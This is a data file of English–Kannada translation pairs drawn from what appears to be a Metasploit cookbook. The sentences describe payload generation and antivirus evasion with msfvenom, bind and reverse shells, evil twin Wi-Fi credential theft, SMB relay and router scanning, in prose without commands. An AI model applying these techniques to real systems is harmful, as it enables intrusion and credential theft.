| {"en":"This attack vector is based on the simple principle of generating a malicious executable.","translation":"ಈ ದಾಳಿ ವೆಕ್ಟರ್ ದುರುದ್ದೇಶಪೂರಿತ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದದನ್ನು ಉತ್ಪಾದಿಸುವ ಸರಳ ತತ್ವವನ್ನು ಆಧರಿಸಿದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"You definitely need a sound knowledge of Ruby scripting if you want to build good modules.","translation":"ನೀವು ಉತ್ತಮ ಮಾಡ್ಯೂಲ್ಗಳನ್ನು ನಿರ್ಮಿಸಲು ಬಯಸಿದರೆ, ನೀವು ರೂಬಿ ಸ್ಕ್ರಿಪ್ಟಿಂಗ್ ಬಗ್ಗೆ ಉತ್ತಮ ಜ್ಞಾನವನ್ನು ಹೊಂದಿರಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"You can also contribute to the Metasploit community by releasing your module and let others benefit from it.","translation":"ನಿಮ್ಮ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಿಡುಗಡೆ ಮಾಡುವ ಮೂಲಕ ನೀವು ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಸಮುದಾಯಕ್ಕೆ ಕೊಡುಗೆ ನೀಡಬಹುದು ಮತ್ತು ಇತರರು ಇದರಿಂದ ಪ್ರಯೋಜನ ಪಡೆಯಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"MSFvenom is the tool to use for payload generation and encoding and it is an evolution of msfpayload and msfencode.","translation":"MSFvenom ಪೇಲೋಡ್ ಉತ್ಪಾದನೆ ಮತ್ತು ಎನ್ಕೋಡಿಂಗ್ಗಾಗಿ ಬಳಸಬೇಕಾದ ಸಾಧನವಾಗಿದೆ ಮತ್ತು ಇದು msfpayload ಮತ್ತು msfencode ನ ವಿಕಸನವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we dig a bit deeper on the available payloads, learn why encoders can be useful when trying to evade detection.","translation":"ಈ ಅಧ್ಯಾಯದಲ್ಲಿ, ನಾವು ಲಭ್ಯವಿರುವ ಪೇಲೋಡ್ಗಳ ಬಗ್ಗೆ ಸ್ವಲ್ಪ ಆಳವಾಗಿ ಅಗೆಯುತ್ತೇವೆ, ಪತ್ತೆಹಚ್ಚುವುದನ್ನು ತಪ್ಪಿಸಲು ಪ್ರಯತ್ನಿಸುವಾಗ ಎನ್ಕೋಡರ್ಗಳು ಏಕೆ ಉಪಯುಕ್ತವಾಗಬಹುದು ಎಂಬುದನ್ನು ಕಲಿಯುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can tell MSFvenom is one of the most versatile and useful payload-generation tools just by looking at the available payloads.","translation":"ಲಭ್ಯವಿರುವ ಪೇಲೋಡ್ಗಳನ್ನು ನೋಡುವ ಮೂಲಕ MSFvenom ಅತ್ಯಂತ ಬಹುಮುಖ ಮತ್ತು ಉಪಯುಕ್ತ ಪೇಲೋಡ್-ಜನರೇಶನ್ ಪರಿಕರಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ ಎಂದು ನಾವು ಹೇಳಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To start experimenting with msfvenom, launch a Terminal window, and use msfvenom –h or msfvenom --help to display the help menu.","translation":"msfvenom ನೊಂದಿಗೆ ಪ್ರಯೋಗಿಸಲು ಪ್ರಾರಂಭಿಸಲು, ಟರ್ಮಿನಲ್ ವಿಂಡೋವನ್ನು ಪ್ರಾರಂಭಿಸಿ ಮತ್ತು ಸಹಾಯ ಮೆನುವನ್ನು ಪ್ರದರ್ಶಿಸಲು msfvenom –h ಅಥವಾ msfvenom --help ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To generate a payload, we always need to use at least two options, -p and -f.","translation":"ಪೇಲೋಡ್ ಅನ್ನು ರಚಿಸಲು, ನಾವು ಯಾವಾಗಲೂ ಕನಿಷ್ಠ ಎರಡು ಆಯ್ಕೆಗಳನ್ನು ಬಳಸಬೇಕಾಗುತ್ತದೆ, -p ಮತ್ತು -f.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The -p option is used to specify which payload to generate from all those available in the Metasploit Framework.","translation":"ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಫ್ರೇಮ್ವರ್ಕ್ನಲ್ಲಿ ಲಭ್ಯವಿರುವ ಎಲ್ಲ ಪೇಲೋಡ್ಗಳಿಂದ ಯಾವ ಪೇಲೋಡ್ ಅನ್ನು ರಚಿಸಬೇಕೆಂದು ನಿರ್ದಿಷ್ಟಪಡಿಸಲು -p ಆಯ್ಕೆಯನ್ನು ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The -f option is used to specify the output format.","translation":"ಔಟ್ಪುಟ್ ಫಾರ್ಮ್ಯಾಟ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಲು -f ಆಯ್ಕೆಯನ್ನು ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"We can also specify a custom payload by using the -p option with -.","translation":"ನಾವು -p ಆಯ್ಕೆಯನ್ನು - ನೊಂದಿಗೆ ಬಳಸುವ ಮೂಲಕ ಕಸ್ಟಮ್ ಪೇಲೋಡ್ ಅನ್ನು ಸಹ ನಿರ್ದಿಷ್ಟಪಡಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"When generating payloads, we use the -a option for the architecture to use, --platform to specify the platform of the payload, and -o to save the payload.","translation":"ಪೇಲೋಡ್ಗಳನ್ನು ರಚಿಸುವಾಗ, ನಾವು ಬಳಸಬೇಕಾದ ಆರ್ಕಿಟೆಕ್ಚರ್ಗಾಗಿ -a ಆಯ್ಕೆಯನ್ನು ಬಳಸುತ್ತೇವೆ, ಪೇಲೋಡ್ನ ಪ್ಲಾಟ್ಫಾರ್ಮ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಲು --platform ಮತ್ತು ಪೇಲೋಡ್ ಅನ್ನು ಉಳಿಸಲು -o ಅನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"One useful feature when doing exploit development, is the --smallest option, which we can use to generate the smallest possible payload.","translation":"ಶೋಷಣೆ ಅಭಿವೃದ್ಧಿ ಮಾಡುವಾಗ ಒಂದು ಉಪಯುಕ್ತ ವೈಶಿಷ್ಟ್ಯವೆಂದರೆ --smallest ಆಯ್ಕೆಯಾಗಿದೆ, ಇದನ್ನು ನಾವು ಸಾಧ್ಯವಾದಷ್ಟು ಚಿಕ್ಕ ಪೇಲೋಡ್ ಅನ್ನು ರಚಿಸಲು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To test this payload, we can set the execution permission using the chmod command, and then run the payload.","translation":"ಈ ಪೇಲೋಡ್ ಅನ್ನು ಪರೀಕ್ಷಿಸಲು, ನಾವು chmod ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಎಕ್ಸಿಕ್ಯೂಷನ್ ಅನುಮತಿಯನ್ನು ಹೊಂದಿಸಬಹುದು, ತದನಂತರ ಪೇಲೋಡ್ ಅನ್ನು ರನ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"In another terminal, we can use netcat to connect to the bind shell on port 4444.","translation":"ಇನ್ನೊಂದು ಟರ್ಮಿನಲ್ನಲ್ಲಿ, ನಾವು ಪೋರ್ಟ್ 4444 ನಲ್ಲಿ ಬೈಂಡ್ ಶೆಲ್ಗೆ ಸಂಪರ್ಕಿಸಲು ನೆಟ್ಕ್ಯಾಟ್ ಅನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Now that we have learned how to create a basic bind shell, we will try to create a reverse shell.","translation":"ನಾವು ಮೂಲಭೂತ ಬೈಂಡ್ ಶೆಲ್ ಅನ್ನು ಹೇಗೆ ರಚಿಸಬೇಕೆಂದು ಕಲಿತಿದ್ದೇವೆ, ನಾವು ರಿವರ್ಸ್ ಶೆಲ್ ಅನ್ನು ರಚಿಸಲು ಪ್ರಯತ್ನಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to see the available options for the selected payload, which we can do using the --payload-options option.","translation":"ಮೊದಲಿಗೆ, ಆಯ್ದ ಪೇಲೋಡ್ಗಾಗಿ ಲಭ್ಯವಿರುವ ಆಯ್ಕೆಗಳನ್ನು ನಾವು ನೋಡಬೇಕು, ಇದನ್ನು ನಾವು --payload-options ಆಯ್ಕೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The options available are overwhelming, but, for the time being, we just need to set up the basic options, such as the listen address and port.","translation":"ಲಭ್ಯವಿರುವ ಆಯ್ಕೆಗಳು ಅಗಾಧವಾಗಿವೆ, ಆದರೆ, ಸದ್ಯಕ್ಕೆ, ನಾವು ಆಲಿಸುವ ವಿಳಾಸ ಮತ್ತು ಪೋರ್ಟ್ನಂತಹ ಮೂಲ ಆಯ್ಕೆಗಳನ್ನು ಹೊಂದಿಸಬೇಕಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Creating payloads for a Windows target is as easy; all we need to do is specify the architecture to use, the target platform, the payload we need to run on the target, the listen followed by the output format and name.","translation":"ವಿಂಡೋಸ್ ಟಾರ್ಗೆಟ್ಗಾಗಿ ಪೇಲೋಡ್ಗಳನ್ನು ರಚಿಸುವುದು ಸುಲಭ; ನಾವು ಮಾಡಬೇಕಾಗಿರುವುದು ಆರ್ಕಿಟೆಕ್ಚರ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವುದು, ಟಾರ್ಗೆಟ್ ಪ್ಲಾಟ್ಫಾರ್ಮ್, ಟಾರ್ಗೆಟ್ನಲ್ಲಿ ನಾವು ರನ್ ಮಾಡಬೇಕಾದ ಪೇಲೋಡ್, ಔಟ್ಪುಟ್ ಫಾರ್ಮ್ಯಾಟ್ ಮತ್ತು ಹೆಸರನ್ನು ಅನುಸರಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Specifying an additional win32 shellcode, by using the -c or --add-code option, we can turn multiple payloads into one.","translation":"-c ಅಥವಾ --add-code ಆಯ್ಕೆಯನ್ನು ಬಳಸುವ ಮೂಲಕ ಹೆಚ್ಚುವರಿ win32 ಶೆಲ್ಕೋಡ್ ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವುದರ ಮೂಲಕ, ನಾವು ಬಹು ಪೇಲೋಡ್ಗಳನ್ನು ಒಂದಾಗಿ ಪರಿವರ್ತಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Nowadays security products, such as Intrusion Detection Systems (IDSs), antivirus and anti-malware software, can easily pick up the shellcode generated by MSFvenom.","translation":"ಇಂದು, ಒಳನುಗ್ಗುವಿಕೆ ಪತ್ತೆಹಚ್ಚುವಿಕೆ ವ್ಯವಸ್ಥೆಗಳು (IDS), ಆಂಟಿವೈರಸ್ ಮತ್ತು ಆಂಟಿ-ಮಾಲ್ವೇರ್ ಸಾಫ್ಟ್ವೇರ್ನಂತಹ ಭದ್ರತಾ ಉತ್ಪನ್ನಗಳು MSFvenom ನಿಂದ ರಚಿಸಲಾದ ಶೆಲ್ಕೋಡ್ ಅನ್ನು ಸುಲಭವಾಗಿ ತೆಗೆದುಕೊಳ್ಳಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Metasploit has an HTTP GET Request URI Fuzzer that we can use.","translation":"ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಒಂದು HTTP GET ವಿನಂತಿ URI ಫಝರ್ ಅನ್ನು ಹೊಂದಿದೆ, ಅದನ್ನು ನಾವು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Looking at the output of the module, we can see that we were able to crash the service.","translation":"ಮಾಡ್ಯೂಲ್ನ ಔಟ್ಪುಟ್ ಅನ್ನು ನೋಡುವಾಗ, ಸೇವೆಯನ್ನು ಕ್ರ್ಯಾಶ್ ಮಾಡಲು ನಮಗೆ ಸಾಧ್ಯವಾಯಿತು ಎಂದು ನಾವು ನೋಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Now, we will learn how it worked and build our own small HTTP fuzzer that can be used against Disk Sorter Enterprise.","translation":"ಈಗ, ಅದು ಹೇಗೆ ಕೆಲಸ ಮಾಡಿದೆ ಎಂಬುದನ್ನು ನಾವು ಕಲಿಯುತ್ತೇವೆ ಮತ್ತು ಡಿಸ್ಕ್ ಸಾರ್ಟರ್ ಎಂಟರ್ಪ್ರೈಸ್ ವಿರುದ್ಧ ಬಳಸಬಹುದಾದ ನಮ್ಮದೇ ಆದ ಸಣ್ಣ HTTP ಫಝರ್ ಅನ್ನು ನಿರ್ಮಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The basic template to build a fuzzer will be similar to the one we discussed for the development of an auxiliary module.","translation":"ಫಝರ್ ಅನ್ನು ನಿರ್ಮಿಸಲು ಮೂಲ ಟೆಂಪ್ಲೇಟ್ ನಾವು ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ನ ಅಭಿವೃದ್ಧಿಗಾಗಿ ಚರ್ಚಿಸಿದ ಒಂದಕ್ಕೆ ಹೋಲುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The @connected instance variable is used to make the connected variable available to all methods within the class.","translation":"@connected ಉದಾಹರಣೆ ವೇರಿಯೇಬಲ್ ಅನ್ನು ವರ್ಗದೊಳಗಿನ ಎಲ್ಲಾ ವಿಧಾನಗಳಿಗೆ ಸಂಪರ್ಕಿತ ವೇರಿಯೇಬಲ್ ಅನ್ನು ಲಭ್ಯವಾಗುವಂತೆ ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"If the waiting period for the response times out, the service is considered to be down.","translation":"ಪ್ರತಿಕ್ರಿಯೆಗಾಗಿ ಕಾಯುವ ಅವಧಿಯು ಸಮಯ ಮೀರುತ್ತಿದ್ದರೆ, ಸೇವೆಯು ಸ್ಥಗಿತಗೊಂಡಿದೆ ಎಂದು ಪರಿಗಣಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Generally, it is not recommended you use Metasploit as a fuzzing platform for large software.","translation":"ಸಾಮಾನ್ಯವಾಗಿ, ದೊಡ್ಡ ಸಾಫ್ಟ್ವೇರ್ಗಾಗಿ ಫಝಿಂಗ್ ಪ್ಲಾಟ್ಫಾರ್ಮ್ನಂತೆ ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಅನ್ನು ಬಳಸಲು ಶಿಫಾರಸು ಮಾಡುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Penetration testing of wireless networks can present an organization with the real risks of compromise.","translation":"ವೈರ್ಲೆಸ್ ನೆಟ್ವರ್ಕ್ಗಳ ನುಗ್ಗುವಿಕೆ ಪರೀಕ್ಷೆಯು ಸಂಸ್ಥೆಗೆ ರಾಜಿ ಅಪಾಯಗಳನ್ನು ಪ್ರಸ್ತುತಪಡಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit is one of the best tools to use when performing wireless penetration testing.","translation":"ವೈರ್ಲೆಸ್ ನುಗ್ಗುವಿಕೆ ಪರೀಕ್ಷೆಯನ್ನು ನಿರ್ವಹಿಸುವಾಗ ಬಳಸಲು ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಅತ್ಯುತ್ತಮ ಸಾಧನಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"We will start by using the Windows Gather Wireless Current Connection Info post-exploitation module.","translation":"ನಾವು ವಿಂಡೋಸ್ ಗ್ಯಾದರ್ ವೈರ್ಲೆಸ್ ಕರೆಂಟ್ ಕನೆಕ್ಷನ್ ಮಾಹಿತಿ ಪೋಸ್ಟ್-ಶೋಷಣೆ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸುವ ಮೂಲಕ ಪ್ರಾರಂಭಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"An evil twin attack is a type of Wi-Fi attack where a rogue Wi-Fi access point (AP) is used.","translation":"ದುಷ್ಟ ಅವಳಿ ದಾಳಿಯು ಒಂದು ರೀತಿಯ ವೈ-ಫೈ ದಾಳಿಯಾಗಿದ್ದು, ಅಲ್ಲಿ ದಂಗೆಕೋರ ವೈ-ಫೈ ಪ್ರವೇಶ ಬಿಂದುವನ್ನು (AP) ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"By imitating a legitimate access point, we can trick users into connecting to it.","translation":"ಸಂಪೂರ್ಣ ಪ್ರವೇಶ ಬಿಂದುವನ್ನು ಅನುಕರಿಸುವ ಮೂಲಕ, ಬಳಕೆದಾರರನ್ನು ಅದಕ್ಕೆ ಸಂಪರ್ಕಿಸಲು ನಾವು ಮೋಸಗೊಳಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"We can steal credentials, redirect victims to malware sites, perform LLMNR, NBT-NS poisoning attacks, and so on.","translation":"ನಾವು ರುಜುವಾತುಗಳನ್ನು ಕದಿಯಬಹುದು, ಬಲಿಪಶುಗಳನ್ನು ಮಾಲ್ವೇರ್ ಸೈಟ್ಗಳಿಗೆ ಮರುನಿರ್ದೇಶಿಸಬಹುದು, LLMNR, NBT-NS ವಿಷ ದಾಳಿಗಳನ್ನು ಮಾಡಬಹುದು ಮತ್ತು ಹೀಗೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"In the process of connecting to a wireless network, most of the operating systems often keep the previous network's connections.","translation":"ವೈರ್ಲೆಸ್ ನೆಟ್ವರ್ಕ್ಗೆ ಸಂಪರ್ಕಿಸುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ, ಹೆಚ್ಚಿನ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ಗಳು ಹಿಂದಿನ ನೆಟ್ವರ್ಕ್ನ ಸಂಪರ್ಕಗಳನ್ನು ಇಟ್ಟುಕೊಳ್ಳುತ್ತವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The adversary actually leverages vulnerabilities in the implementation of the algorithms.","translation":"ಪ್ರತಿಸ್ಪರ್ಧಿ ವಾಸ್ತವವಾಗಿ ಅಲ್ಗಾರಿದಮ್ಗಳ ಅನುಷ್ಠಾನದಲ್ಲಿನ ದುರ್ಬಲತೆಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತಾನೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Once the victim is connected to the fake AP, the attacker now has an IP-level connection to the victim.","translation":"ಬಲಿಪಶು ನಕಲಿ AP ಗೆ ಸಂಪರ್ಕಗೊಂಡ ನಂತರ, ದಾಳಿಕೋರ ಈಗ ಬಲಿಪಶುವಿಗೆ IP-ಮಟ್ಟದ ಸಂಪರ್ಕವನ್ನು ಹೊಂದಿದ್ದಾನೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"SMB relay attacks allow us to relay SMB authentication requests to another host.","translation":"SMB ರಿಲೇ ದಾಳಿಗಳು SMB ದೃಢೀಕರಣ ವಿನಂತಿಗಳನ್ನು ಮತ್ತೊಂದು ಹೋಸ್ಟ್ಗೆ ರವಾನಿಸಲು ನಮಗೆ ಅವಕಾಶ ಮಾಡಿಕೊಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"If the user has administrator access in the target host, it is possible to execute arbitrary commands.","translation":"ಬಳಕೆದಾರರು ಗುರಿ ಹೋಸ್ಟ್ನಲ್ಲಿ ನಿರ್ವಾಹಕ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿದ್ದರೆ, ಅನಿಯಂತ್ರಿತ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಸಾಧ್ಯವಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Because we are only able to gain command execution if the user is an administrator on the target machine.","translation":"ಏಕೆಂದರೆ ಬಳಕೆದಾರರು ಗುರಿ ಯಂತ್ರದಲ್ಲಿ ನಿರ್ವಾಹಕರಾಗಿದ್ದರೆ ಮಾತ್ರ ನಾವು ಆಜ್ಞಾ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯನ್ನು ಪಡೆಯಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"With the growth of cloud computing, tests for cloud-based applications, services, and infrastructures are on the rise.","translation":"ಮೇಘ ಕಂಪ್ಯೂಟಿಂಗ್ನ ಬೆಳವಣಿಗೆಯೊಂದಿಗೆ, ಮೇಘ-ಆಧಾರಿತ ಅಪ್ಲಿಕೇಶನ್ಗಳು, ಸೇವೆಗಳು ಮತ್ತು ಮೂಲಸೌಕರ್ಯಗಳ ಪರೀಕ್ಷೆಗಳು ಹೆಚ್ಚುತ್ತಿವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This module will enumerate user accounts in the default domain using PowerShell.","translation":"ಈ ಮಾಡ್ಯೂಲ್ ಪವರ್ಶೆಲ್ ಬಳಸಿ ಡೀಫಾಲ್ಟ್ ಡೊಮೇನ್ನಲ್ಲಿ ಬಳಕೆದಾರ ಖಾತೆಗಳನ್ನು ಎಣಿಕೆ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To test it, I have added the Active Directory Domain Services Role to the Metasploitable 3 machine.","translation":"ಇದನ್ನು ಪರೀಕ್ಷಿಸಲು, ನಾನು ಮೆಟಾಸ್ಪ್ಲೋಯಿಟೇಬಲ್ 3 ಯಂತ್ರಕ್ಕೆ ಸಕ್ರಿಯ ಡೈರೆಕ್ಟರಿ ಡೊಮೇನ್ ಸೇವೆಗಳ ಪಾತ್ರವನ್ನು ಸೇರಿಸಿದ್ದೇನೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Since we do not need to be a privileged user to use this module, it can be very useful during post exploitation.","translation":"ಈ ಮಾಡ್ಯೂಲ್ ಬಳಸಲು ನಾವು ಸವಲತ್ತು ಪಡೆದ ಬಳಕೆದಾರರಾಗಿರಬೇಕಾಗಿಲ್ಲವಾದ್ದರಿಂದ, ಇದು ಪೋಸ್ಟ್ ಶೋಷಣ ಸಮಯದಲ್ಲಿ ಬಹಳ ಉಪಯುಕ್ತವಾಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"For that reason, in this recipe, we will learn how to build our own auxiliary module.","translation":"ಆ ಕಾರಣಕ್ಕಾಗಿ, ಈ ಪಾಕವಿಧಾನದಲ್ಲಿ, ನಮ್ಮದೇ ಆದ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಹೇಗೆ ನಿರ್ಮಿಸುವುದು ಎಂಬುದನ್ನು ನಾವು ಕಲಿಯುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"CWMP is a protocol used by providers for remote management of customer-premises equipment.","translation":"CWMP ಎನ್ನುವುದು ಗ್ರಾಹಕ-ಆವರಣ ಉಪಕರಣಗಳ ದೂರಸ್ಥ ನಿರ್ವಹಣೆಗಾಗಿ ಪೂರೈಕೆದಾರರು ಬಳಸುವ ಪ್ರೋಟೋಕಾಲ್ ಆಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"When we connect to the router using the CWMP default port 7547, we get the following answer:","translation":"ನಾವು CWMP ಡೀಫಾಲ್ಟ್ ಪೋರ್ಟ್ 7547 ಅನ್ನು ಬಳಸಿಕೊಂಡು ರೂಟರ್ಗೆ ಸಂಪರ್ಕಿಸಿದಾಗ, ನಾವು ಈ ಕೆಳಗಿನ ಉತ್ತರವನ್ನು ಪಡೆಯುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"By using curl with the -v option for verbose, we can see the request made and the reply from the router:","translation":"ವಿವರಗಳಿಗಾಗಿ -v ಆಯ್ಕೆಯೊಂದಿಗೆ ಕರ್ಲ್ ಅನ್ನು ಬಳಸುವ ಮೂಲಕ, ವಿನಂತಿಯನ್ನು ಮತ್ತು ರೂಟರ್ನಿಂದ ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ನಾವು ನೋಡಬಹುದು:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"With this information, we can build an auxiliary module to scan a target range and identify targets running Huawei home routers with CWMP enabled.","translation":"ಈ ಮಾಹಿತಿಯೊಂದಿಗೆ, ಟಾರ್ಗೆಟ್ ಶ್ರೇಣಿಯನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಲು ಮತ್ತು CWMP ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿದ Huawei ಹೋಮ್ ರೂಟರ್ಗಳನ್ನು ಚಾಲನೆ ಮಾಡುವ ಟಾರ್ಗೆಟ್ಗಳನ್ನು ಗುರುತಿಸಲು ನಾವು ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ನಿರ್ಮಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Since Metasploit probably already has a module with the base features we are looking for, the first thing we should do is search the available modules and see what we can use.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಈಗಾಗಲೇ ನಾವು ಹುಡುಕುತ್ತಿರುವ ಮೂಲ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಹೊಂದಿರುವ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಹೊಂದಿರಬಹುದು, ನಾವು ಮಾಡಬೇಕಾದ ಮೊದಲನೆಯದು ಲಭ್ಯವಿರುವ ಮಾಡ್ಯೂಲ್ಗಳನ್ನು ಹುಡುಕುವುದು ಮತ್ತು ನಾವು ಏನು ಬಳಸಬಹುದು ಎಂಬುದನ್ನು ನೋಡುವುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Again, we will just focus on the run method.","translation":"ಮತ್ತೆ, ನಾವು ರನ್ ವಿಧಾನದ ಮೇಲೆ ಮಾತ್ರ ಗಮನಹರಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"For our module, we will start by changing the initialize method.","translation":"ನಮ್ಮ ಮಾಡ್ಯೂಲ್ಗಾಗಿ, ನಾವು ಪ್ರಾರಂಭಿಕ ವಿಧಾನವನ್ನು ಬದಲಾಯಿಸುವ ಮೂಲಕ ಪ್ರಾರಂಭಿಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Using the register_options data structure, we can specify the default port number for the module, and since we want to scan for the CWMP service we will specify port 7547:","translation":"register_options ಡೇಟಾ ರಚನೆಯನ್ನು ಬಳಸಿಕೊಂಡು, ನಾವು ಮಾಡ್ಯೂಲ್ಗಾಗಿ ಡೀಫಾಲ್ಟ್ ಪೋರ್ಟ್ ಸಂಖ್ಯೆಯನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬಹುದು ಮತ್ತು ನಾವು CWMP ಸೇವೆಯನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಲು ಬಯಸುವುದರಿಂದ ನಾವು ಪೋರ್ಟ್ 7547 ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Then, we need to compare the response and verify that the equipment is a Huawei Home Gateway.","translation":"ನಂತರ, ನಾವು ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ಹೋಲಿಸಬೇಕು ಮತ್ತು ಉಪಕರಣವು Huawei ಹೋಮ್ ಗೇಟ್ವೇ ಎಂದು ಪರಿಶೀಲಿಸಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"For that, we will create a new variable called huawei holding the response from our router:","translation":"ಅದಕ್ಕಾಗಿ, ನಾವು huawei ಎಂಬ ಹೊಸ ವೇರಿಯೇಬಲ್ ಅನ್ನು ರಚಿಸುತ್ತೇವೆ ಅದು ನಮ್ಮ ರೂಟರ್ನಿಂದ ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ಹಿಡಿದಿಟ್ಟುಕೊಳ್ಳುತ್ತದೆ:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
